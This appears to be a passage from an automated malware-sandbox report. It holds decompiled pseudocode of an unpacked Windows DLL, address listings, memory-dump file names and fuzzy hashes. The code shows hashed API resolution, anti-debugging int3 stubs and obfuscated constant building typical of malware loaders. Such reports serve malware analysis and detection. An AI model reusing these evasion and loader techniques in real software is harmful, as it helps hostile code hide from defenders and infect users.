								E6ECFF5A8(_t430 + 0x18c, _t207);
								_t412 = E6ED03044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t412;
								if(_t412 == 0) {
									L133:
									E6ECFF678(_t430 + 0x188);
									goto L72;
								}
								_t213 = E6ECFF4E0(_t430 + 0x18c, 0);
								_t214 = E6ECFF4F0(_t430 + 0x188);
								_t216 =  *_t412( *((intOrPtr*)(_t430 + 0x1ac)), 1, _t213, _t214, _t430 + 0x1a4);
								__eflags = _t216;
								if(_t216 == 0) {
									_t217 = E6ED035C8(_t412);
									__eflags = _t217;
									if(_t217 != 0) {
										goto L133;
									}
								}
								_t424 = E6ECFF4E0(_t430 + 0x18c, 0);
								E6ECFDF84(_t430 + 0x1b4, 0);
								 *((intOrPtr*)(_t430 + 0x1ac)) = 0;
								_t378 = E6ED03044(0x8b9d0da7, 0x628b2cfa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t378;
								if(_t378 != 0) {
									 *_t378( *_t424, _t430 + 0x1ac);
								}
								E6ECFDFF8(_t430 + 0x1b4,  *((intOrPtr*)(_t430 + 0x1ac)));
								_t224 = E6ED03044(0x10154545, 0x44fb2dcc, 0x10154545, 0x10154545);
								__eflags = _t224;
								if(_t224 != 0) {
									_push( *((intOrPtr*)(_t430 + 0x1ac)));
									asm("int3");
									asm("int3");
								}
								E6ECFE0A4(_t430 + 0x1b8 - 8, _t430 + 0x1b8);
								_t426 = E6ED04FD4( *((intOrPtr*)(_t430 + 0x1b8)), E6ECFE8D4( *((intOrPtr*)(_t430 + 0x1b8)), 0x7fffffff));
								E6ECFDFDC(_t430 + 0x1b8);
								E6ECFDFDC(_t430 + 0x1b0);
								E6ECFF678(_t430 + 0x188);
								__eflags =  *((char*)(_t430 + 0x34));
								if( *((char*)(_t430 + 0x34)) != 0) {
									E6ECFBB88(_t430 + 0x30);
								}
								__eflags = _t426 - 0x6df4cf7;
								if(_t426 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6ed0d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t430 + 0x34)) != 0) {
									E6ECFBB88(_t430 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t430 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t364() == 0) {
						_t260 = E6ED035C8(_t405);
						__eflags = _t260;
						if(_t260 != 0) {
							goto L12;
						}
					}
					 *((intOrPtr*)(_t430 + 0x14)) =  *((intOrPtr*)(_t430 + 0x198));
					 *((char*)(_t430 + 0x18)) = 1;
					 *((intOrPtr*)(_t430 + 0x1a0)) = 0;
					_t348 = E6ED03044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
					if(_t348 != 0) {
						_push(_t430 + 0x1a0);
						_push(0);
						_push(0);
						_push(2);
						_push( *((intOrPtr*)(_t430 + 0x1a8)));
						if( *_t348() == 0) {
							E6ED035C8(_t405);
						}
					}
					_t263 =  *((intOrPtr*)(_t430 + 0x1a0));
					if( *((intOrPtr*)(_t430 + 0x1a0)) != 0) {
						E6ECFF5A8(_t430 + 0x3c, _t263);
						_t408 = E6ED03044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t408;
						if(_t408 == 0) {
							L107:
							E6ECFF678(_t430 + 0x38);
							goto L10;
						}
						_t269 = E6ECFF4E0(_t430 + 0x3c, 0);
						_t270 = E6ECFF4F0(_t430 + 0x38);
						_t272 =  *_t408( *((intOrPtr*)(_t430 + 0x1a8)), 2, _t269, _t270, _t430 + 0x1a0);
						__eflags = _t272;
						if(_t272 == 0) {
							_t273 = E6ED035C8(_t408);
							__eflags = _t273;
							if(_t273 != 0) {
								goto L107;
							}
						}
						_t428 = E6ECFF4E0(_t430 + 0x3c, 0);
						 *((intOrPtr*)(_t430 + 0x1d8 - 0x30)) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t408 = E6ED03044(0x8b9d0da7, 0xbdc0a291, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t408;
						if(_t408 == 0) {
							goto L107;
						}
						_t277 = _t430 + 0x1a8;
						_t278 =  *_t408(_t277 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t277);
						__eflags = _t278;
						if(_t278 == 0) {
							_t279 = E6ED035C8(_t408);
							__eflags = _t279;
							if(_t279 != 0) {
								goto L107;
							}
						}
						_t404 =  *((intOrPtr*)(_t430 + 0x1a8));
						__eflags =  *_t428;
						if( *_t428 <= 0) {
							L101:
							__eflags = _t404;
							if(_t404 == 0) {
								L103:
								_t394 = 1;
								L105:
								__eflags = _t394;
								if(_t394 == 0) {
									E6ED00FF8(_t404, _t408, _t404);
								}
								goto L107;
							}
							__eflags = _t404 - 0xffffffff;
							if(_t404 != 0xffffffff) {
								_t394 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t414 = 0;
						__eflags = 0;
						do {
							_t283 = E6ED03044(0x8b9d0da7, 0x2ae47d4a, 0x8b9d0da7, 0x8b9d0da7);
							__eflags = _t283;
							if(_t283 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t428 + 4 + _t414 * 8)));
							_push( *((intOrPtr*)(_t430 + 0x1ac)));
							asm("int3");
							asm("int3");
							__eflags = _t283;
							if(_t283 == 0) {
								goto L100;
							}
							__eflags = _t404;
							if(_t404 == 0) {
								L93:
								_t396 = 1;
								L95:
								__eflags = _t396;
								if(_t396 == 0) {
									E6ED00FF8(_t404, _t414, _t404);
								}
								E6ECFF678(_t430 + 0x38);
								__eflags =  *((char*)(_t430 + 0x18));
								if( *((char*)(_t430 + 0x18)) != 0) {
									E6ECFBB88(_t430 + 0x14);
								}
								_t365 = 1;
								goto L13;
							}
							__eflags = _t404 - 0xffffffff;
							if(_t404 != 0xffffffff) {
								_t396 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t414 = _t414 + 1;
							__eflags = _t414 -  *_t428;
						} while (_t414 <  *_t428);
						goto L101;
					}
					L10:
					if( *((char*)(_t430 + 0x18)) != 0) {
						E6ECFBB88(_t430 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6ed00763
0x6ed00765
0x6ed0076c
0x6ed00feb
0x6ed00ff1
0x6ed00ff1
0x6ed00776
0x6ed00782
0x6ed0078e
0x6ed00793
0x6ed007a0
0x6ed007b1
0x6ed007b3
0x6ed007b4
0x6ed007b5
0x6ed007b5
0x6ed007b6
0x6ed007ba
0x6ed007be
0x6ed007c3
0x6ed007c6
0x6ed007cc
0x6ed007e6
0x6ed007ed
0x6ed007f0
0x6ed007f3
0x6ed007f5
0x6ed00801
0x6ed0080e
0x6ed0081b
0x6ed0081f
0x6ed008ab
0x6ed008ab
0x6ed008ad
0x6ed008b1
0x6ed008bc
0x6ed008d2
0x6ed008d5
0x6ed008d5
0x6ed008d9
0x6ed008e2
0x6ed008e7
0x6ed008e7
0x6ed008e9
0x6ed008fa
0x6ed0091c
0x6ed0091e
0x6ed0091f
0x6ed00923
0x6ed00923
0x6ed0092c
0x6ed00938
0x6ed00941
0x6ed00957
0x6ed00967
0x6ed0096c
0x6ed00970
0x6ed00975
0x6ed00977
0x6ed009c7
0x6ed009dc
0x6ed009e0
0x6ed009e5
0x6ed009f6
0x6ed00a0b
0x6ed00a0f
0x6ed00a14
0x6ed00a16
0x6ed00a5d
0x6ed00a60
0x6ed00aae
0x6ed00ab1
0x6ed00af2
0x6ed00af6
0x6ed00afb
0x6ed00b00
0x6ed00b1f
0x6ed00b1f
0x6ed00b1f
0x6ed00b21
0x00000000
0x6ed00b21
0x6ed00b02
0x6ed00b06
0x6ed00b08
0x6ed00b0f
0x6ed00b0f
0x6ed00b15
0x6ed00b15
0x6ed00b17
0x6ed00b1a
0x6ed00b1a
0x00000000
0x6ed00b17
0x6ed00b0a
0x6ed00b0d
0x6ed00b13
0x6ed00b13
0x00000000
0x6ed00b13
0x00000000
0x6ed00b0d
0x6ed00ab3
0x6ed00ab6
0x00000000
0x00000000
0x6ed00abc
0x6ed00ac1
0x6ed00ac6
0x6ed00ae5
0x6ed00ae5
0x6ed00aef
0x00000000
0x6ed00aef
0x6ed00ac8
0x6ed00acc
0x6ed00ace
0x6ed00ad5
0x6ed00ad5
0x6ed00adb
0x6ed00adb
0x6ed00add
0x6ed00ae0
0x6ed00ae0
0x00000000
0x6ed00add
0x6ed00ad0
0x6ed00ad3
0x6ed00ad9
0x6ed00ad9
0x00000000
0x6ed00ad9
0x00000000
0x6ed00ad3
0x6ed00a62
0x6ed00a64
0x6ed00aa3
0x6ed00aa6
0x6ed00e18
0x6ed00e1d
0x6ed00e22
0x6ed00e41
0x6ed00e41
0x6ed00e4b
0x00000000
0x6ed00e4b
0x6ed00e24
0x6ed00e28
0x6ed00e2a
0x6ed00e31
0x6ed00e31
0x6ed00e37
0x6ed00e37
0x6ed00e39
0x6ed00e3c
0x6ed00e3c
0x00000000
0x6ed00e39
0x6ed00e2c
0x6ed00e2f
0x6ed00e35
0x6ed00e35
0x00000000
0x6ed00e35
0x00000000
0x6ed00e2f
0x00000000
0x6ed00aac
0x6ed00a6a
0x6ed00a6f
0x6ed00a74
0x6ed00a93
0x6ed00a93
0x6ed00a9d
0x00000000
0x6ed00a9d
0x6ed00a76
0x6ed00a7a
0x6ed00a7c
0x6ed00a83
0x6ed00a83
0x6ed00a89
0x6ed00a89
0x6ed00a8b
0x6ed00a8e
0x6ed00a8e
0x00000000
0x6ed00a8b
0x6ed00a7e
0x6ed00a81
0x6ed00a87
0x6ed00a87
0x00000000
0x6ed00a87
0x00000000
0x6ed00a81
0x6ed00a18
0x6ed00a1a
0x00000000
0x00000000
0x6ed00a24
0x6ed00a29
0x6ed00a2e
0x6ed00a4d
0x6ed00a4d
0x6ed00a57
0x00000000
0x6ed00a57
0x6ed00a30
0x6ed00a34
0x6ed00a36
0x6ed00a3d
0x6ed00a3d
0x6ed00a43
0x6ed00a43
0x6ed00a45
0x6ed00a48
0x6ed00a48
0x00000000
0x6ed00a45
0x6ed00a38
0x6ed00a3b
0x6ed00a41
0x6ed00a41
0x00000000
0x6ed00a41
0x00000000
0x6ed00a3b
0x6ed0097d
0x6ed00982
0x6ed00987
0x6ed009a6
0x6ed009a6
0x6ed009b0
0x00000000
0x6ed009b0
0x6ed00989
0x6ed0098d
0x6ed0098f
0x6ed00996
0x6ed00996
0x6ed0099c
0x6ed0099c
0x6ed0099e
0x6ed009a1
0x6ed009a1
0x00000000
0x6ed0099e
0x6ed00991
0x6ed00994
0x6ed0099a
0x6ed0099a
0x00000000
0x6ed0099a
0x00000000
0x6ed008be
0x6ed008c0
0x6ed00b25
0x6ed00b2a
0x6ed00b2d
0x6ed00b32
0x6ed00b34
0x6ed00b49
0x6ed00b4c
0x6ed00c1a
0x6ed00c22
0x6ed00c25
0x6ed00c36
0x6ed00c3a
0x6ed00c44
0x6ed00c44
0x6ed00c46
0x6ed00c48
0x6ed00c57
0x6ed00c63
0x6ed00c67
0x6ed00c6a
0x6ed00c6d
0x6ed00c70
0x00000000
0x6ed00c70
0x6ed00b5c
0x6ed00b6e
0x6ed00b72
0x6ed00bfe
0x6ed00bfe
0x6ed00c04
0x6ed00c0f
0x6ed00c06
0x6ed00c06
0x6ed00c06
0x00000000
0x6ed00c04
0x6ed00b7f
0x6ed00b80
0x6ed00b82
0x6ed00b88
0x6ed00fd7
0x6ed00fdc
0x6ed00fde
0x00000000
0x00000000
0x6ed00fe4
0x6ed00b9f
0x6ed00ba3
0x6ed00ba8
0x6ed00bba
0x6ed00bbe
0x6ed00bc9
0x6ed00bca
0x6ed00bcb
0x6ed00bcc
0x6ed00bce
0x6ed00bd9
0x6ed00e51
0x6ed00e51
0x6ed00bd9
0x6ed00bdf
0x6ed00be8
0x6ed00e63
0x6ed00e79
0x6ed00e7b
0x6ed00e7d
0x6ed00fb8
0x6ed00fbf
0x00000000
0x6ed00fbf
0x6ed00e8c
0x6ed00e9a
0x6ed00eb4
0x6ed00eb6
0x6ed00eb8
0x6ed00fc9
0x6ed00fce
0x6ed00fd0
0x00000000
0x00000000
0x6ed00fd2
0x6ed00ecc
0x6ed00ed7
0x6ed00ee6
0x6ed00ef8
0x6ed00efa
0x6ed00efc
0x6ed00f09
0x6ed00f09
0x6ed00f19
0x6ed00f2a
0x6ed00f2f
0x6ed00f31
0x6ed00f33
0x6ed00f3a
0x6ed00f3b
0x6ed00f3b
0x6ed00f47
0x6ed00f68
0x6ed00f71
0x6ed00f7d
0x6ed00f89
0x6ed00f8e
0x6ed00f93
0x6ed00f99
0x6ed00f99
0x6ed00f9e
0x6ed00fa4
0x00000000
0x6ed00faa
0x6ed00fac
0x00000000
0x6ed00fac
0x6ed00bee
0x6ed00bee
0x6ed00bf3
0x6ed00bf9
0x6ed00bf9
0x00000000
0x6ed00bf3
0x6ed00be8
0x6ed008bc
0x6ed0082c
0x6ed0082d
0x6ed0082f
0x6ed00835
0x6ed00e02
0x6ed00e07
0x6ed00e09
0x00000000
0x00000000
0x6ed00e0f
0x6ed0084c
0x6ed00850
0x6ed00855
0x6ed00867
0x6ed0086b
0x6ed00876
0x6ed00877
0x6ed00878
0x6ed00879
0x6ed0087b
0x6ed00886
0x6ed00c7e
0x6ed00c7e
0x6ed00886
0x6ed0088c
0x6ed00895
0x6ed00c8d
0x6ed00ca3
0x6ed00ca5
0x6ed00ca7
0x6ed00dd8
0x6ed00ddc
0x00000000
0x6ed00ddc
0x6ed00cb3
0x6ed00cbe
0x6ed00cd8
0x6ed00cda
0x6ed00cdc
0x6ed00df4
0x6ed00df9
0x6ed00dfb
0x00000000
0x00000000
0x6ed00dfd
0x6ed00ced
0x6ed00cfb
0x6ed00d02
0x6ed00d03
0x6ed00d04
0x6ed00d16
0x6ed00d18
0x6ed00d1a
0x00000000
0x00000000
0x6ed00d22
0x6ed00d3d
0x6ed00d3f
0x6ed00d41
0x6ed00de6
0x6ed00deb
0x6ed00ded
0x00000000
0x00000000
0x6ed00def
0x6ed00d47
0x6ed00d4e
0x6ed00d52
0x6ed00dbd
0x6ed00dbd
0x6ed00dbf
0x6ed00dc6
0x6ed00dc6
0x6ed00dcc
0x6ed00dcc
0x6ed00dce
0x6ed00dd3
0x6ed00dd3
0x00000000
0x6ed00dce
0x6ed00dc1
0x6ed00dc4
0x6ed00dca
0x6ed00dca
0x00000000
0x6ed00dca
0x00000000
0x6ed00dc4
0x6ed00d54
0x6ed00d54
0x6ed00d56
0x6ed00d62
0x6ed00d67
0x6ed00d69
0x00000000
0x00000000
0x6ed00d6b
0x6ed00d6f
0x6ed00d76
0x6ed00d77
0x6ed00d78
0x6ed00d7a
0x00000000
0x00000000
0x6ed00d7c
0x6ed00d7e
0x6ed00d85
0x6ed00d85
0x6ed00d8b
0x6ed00d8b
0x6ed00d8d
0x6ed00d92
0x6ed00d92
0x6ed00d9b
0x6ed00da0
0x6ed00da5
0x6ed00dab
0x6ed00dab
0x6ed00db0
0x00000000
0x6ed00db0
0x6ed00d80
0x6ed00d83
0x6ed00d89
0x6ed00d89
0x00000000
0x6ed00d89
0x00000000
0x6ed00db7
0x6ed00db7
0x6ed00db8
0x6ed00db8
0x00000000
0x6ed00d56
0x6ed0089b
0x6ed008a0
0x6ed008a6
0x6ed008a6
0x00000000
0x6ed00c7d
0x6ed00c7d
0x6ed00c7d

Strings

J}*, xrefs: 6ED00D5B

Memory Dump Source

Source File: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000000.00000002.647878213.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648291272.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648382411.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: J}*
API String ID: 0-3566034359
Opcode ID: 3fe0d05b58bcc617d89e32a5ed234c06fcaf5240d30e30b86cf17c9da3a5ca3e
Instruction ID: 98cb6b8d4290427be7204b8f23400397a3a29107b1fd82dcacad430683410bbb
Opcode Fuzzy Hash: 3fe0d05b58bcc617d89e32a5ed234c06fcaf5240d30e30b86cf17c9da3a5ca3e
Instruction Fuzzy Hash: 0922C270608341FEE7A0DFA4C850BEB77A9AF81388F188D19E4959B194FB70D946C762

Uniqueness

Uniqueness Score: -1.00%

Function 6ECF1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6ECF1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6ECFF5A8( &_v72, 0);
				_v60 = 0x790529cb;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v76, E6ECFF4F0( &_v76) + 0x10);
				E6ECFF4E0( &_v80, E6ECFF4F0( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0xdee5e4fb;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v84, E6ECFF4F0(_t325) + 0x10);
				E6ECFF4E0( &_v88, E6ECFF4F0( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xeabbe5b1;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v92, E6ECFF4F0(_t329) + 0x10);
				E6ECFF4E0( &_v96, E6ECFF4F0( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x9a85f5ac;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v100, E6ECFF4F0(_t333) + 0x10);
				E6ECFF4E0( &_v104, E6ECFF4F0( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0x93251419;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v108, E6ECFF4F0(_t337) + 0x10);
				E6ECFF4E0( &_v112, E6ECFF4F0( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x26dec0d0;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v116, E6ECFF4F0(_t341) + 0x10);
				E6ECFF4E0( &_v120, E6ECFF4F0( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xa7a69cc6;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v124, E6ECFF4F0(_t345) + 0x10);
				E6ECFF4E0( &_v128, E6ECFF4F0( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x1a9c1df5;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v132, E6ECFF4F0(_t349) + 0x10);
				E6ECFF4E0( &_v136, E6ECFF4F0( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x77fa1d17;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v140, E6ECFF4F0(_t353) + 0x10);
				E6ECFF4E0( &_v144, E6ECFF4F0( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xabb27594;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v148, E6ECFF4F0(_t357) + 0x10);
				E6ECFF4E0( &_v152, E6ECFF4F0( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xfe904c4d;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v156, E6ECFF4F0(_t361) + 0x10);
				E6ECFF4E0( &_v160, E6ECFF4F0( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0xde72067;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v164, E6ECFF4F0(_t365) + 0x10);
				E6ECFF4E0( &_v168, E6ECFF4F0( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x82fffbdc;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v172, E6ECFF4F0(_t369) + 0x10);
				E6ECFF4E0( &_v176, E6ECFF4F0( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0xdb278333;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v180, E6ECFF4F0(_t373) + 0x10);
				E6ECFF4E0( &_v184, E6ECFF4F0( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0xc380629b;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v188, E6ECFF4F0(_t377) + 0x10);
				E6ECFF4E0( &_v192, E6ECFF4F0( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0xd5e26663;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v196, E6ECFF4F0(_t381) + 0x10);
				E6ECFF4E0( &_v200, E6ECFF4F0( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0xc09bf2f8;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v204, E6ECFF4F0(_t385) + 0x10);
				E6ECFF4E0( &_v208, E6ECFF4F0( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6ED041D8(0xfe338407, _t434);
				E6ECFF4E0( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6ECFF4E0( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6ECFF4E0( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6ECFF4E0( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6ECFF4E0( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6ECFF4E0( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6ECFF4E0( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6ECFF4E0( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6ECFF4E0( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6ECFF4E0( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6ECFF4E0( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6ECFF4E0( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6ECFF4E0( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6ECFF4E0( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6ECFF4E0( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6ECFF4E0( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6ECFF4E0( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6ECF1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6ECFB2C0( &_v248, _v256, _t481, _v252, _t318);
				E6ECFF864( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xa09bf9c8;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v296, E6ECFF4F0(_t410) + 0x10);
				E6ECFF4E0( &_v300, E6ECFF4F0( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x2b5b930c;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v304, E6ECFF4F0(_t414) + 0x10);
				E6ECFF4E0( &_v308, E6ECFF4F0( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x453267ca;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v312, E6ECFF4F0(_t418) + 0x10);
				E6ECFF4E0( &_v316, E6ECFF4F0( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xb38fc5b8;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF84C( &_v320, E6ECFF4F0(_t422) + 0x10);
				E6ECFF4E0( &_v324, E6ECFF4F0( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6ECFBA40(_t154,  *_t480);
				E6ECFF4E0( &_v340, 0);
